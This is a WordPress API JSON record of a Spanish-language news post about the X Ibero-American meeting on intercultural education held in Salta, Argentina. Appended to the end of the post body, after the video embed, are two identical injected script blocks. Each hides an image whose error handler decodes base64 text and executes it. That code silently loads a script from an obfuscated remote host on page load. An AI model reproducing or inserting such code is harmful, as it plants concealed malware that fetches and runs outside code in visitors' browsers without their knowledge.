{"id":4278,"date":"2024-08-09T11:37:03","date_gmt":"2024-08-09T14:37:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4278"},"modified":"2025-08-13T23:51:07","modified_gmt":"2025-08-14T02:51:07","slug":"salta-es-sede-del-x-encuentro-iberoamericano-de-educacion-intercultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4278","title":{"rendered":"Salta es sede del X Encuentro Iberoamericano de educaci\u00f3n intercultural"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d60bf39fcd173891131e00b6f395b866\" style=\"background-color:#91092b\"><em>La ministra de Educaci\u00f3n Cristina Fiore encabez\u00f3 la apertura del encuentro que se realiz\u00f3 en el Hogar Escuela de Salta Capital y que nucle\u00f3 a m\u00e1s de 500 docentes de Argentina, Brasil, Bolivia, Colombia, Espa\u00f1a, M\u00e9xico, Per\u00fa y Venezuela.<\/em><\/h4>\n\n\n\n<p>Hasta el 10 de agosto se realiza en Salta el X Encuentro Iberoamericano de Colectivos y Redes de Educadoras y Educadores que investigan bajo el enfoque de escuela y comunidad para la emancipaci\u00f3n. El acto central de apertura de actividades tuvo lugar en el sal\u00f3n de actos del Hogar Escuela y fue presidido por la ministra de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda de la provincia,&nbsp;<strong>Cristina Fiore Vi\u00f1uales<\/strong>.<\/p>\n\n\n\n<p>Durante la apertura de la jornada, en la que se reflexionar\u00e1 acerca del papel que juega la educaci\u00f3n con respecto a la diversidad cultural, Fiore destac\u00f3 la importancia de la integraci\u00f3n entre Naciones y resalt\u00f3 el rol que le compete a la escuela en ese proceso, desde una mirada de aulas heterog\u00e9neas, inclusivas y diversas.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13350-salta-es-sede-del-x-encuentro-iberoamericano-de-educacion-intercultural.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13350-salta-es-sede-del-x-encuentro-iberoamericano-de-educacion-intercultural.jpg\" alt=\"Salta es sede del X Encuentro Iberoamericano de educaci\u00f3n intercultural\"\/><\/a><\/figure>\n\n\n\n<p>Son m\u00e1s de 500 los docentes que participan de la actividad, e incluye delegaciones de los pa\u00edses de Argentina, Brasil, Bolivia, Colombia, Espa\u00f1a, M\u00e9xico, Per\u00fa y Venezuela. El objetivo es visibilizar experiencias y propuestas pedag\u00f3gicas transformadoras y emancipadoras impulsadas por redes de docentes de Am\u00e9rica Latina y Espa\u00f1a, como as\u00ed tambi\u00e9n fortalecer redes docentes desde un posicionamiento \u00e9tico, pol\u00edtico y pedag\u00f3gico con car\u00e1cter emancipador.<\/p>\n\n\n\n<p>En esta edici\u00f3n, Salta propuso una agenda de actividades tanto en el interior como en la capital y se concretan territorialmente a trav\u00e9s de las coordinaciones de Educaci\u00f3n Intercultural Biling\u00fce (CEIB) y Educaci\u00f3n Rural y la Universidad Nacional de Salta a trav\u00e9s del Centro de Investigaciones Sociales y Educativas del Norte argentino (CISEN) y el Instituto de Investigaci\u00f3n en Lenguas de la Facultad de Humanidades.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta es sede del X Encuentro Iberoamericano de educaci\u00f3n intercultural\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/tg13ErnRxwM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ministra de Educaci\u00f3n Cristina Fiore encabez\u00f3 la apertura del encuentro que se realiz\u00f3 en el Hogar Escuela de Salta Capital y que nucle\u00f3 a m\u00e1s de 500 docentes de Argentina, Brasil, Bolivia, Colombia, Espa\u00f1a, M\u00e9xico, Per\u00fa y Venezuela. Hasta el 10 de agosto se realiza en Salta el X Encuentro Iberoamericano de Colectivos y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4279,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4278","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4278"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4278"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4278\/revisions"}],"predecessor-version":[{"id":6717,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4278\/revisions\/6717"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4279"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}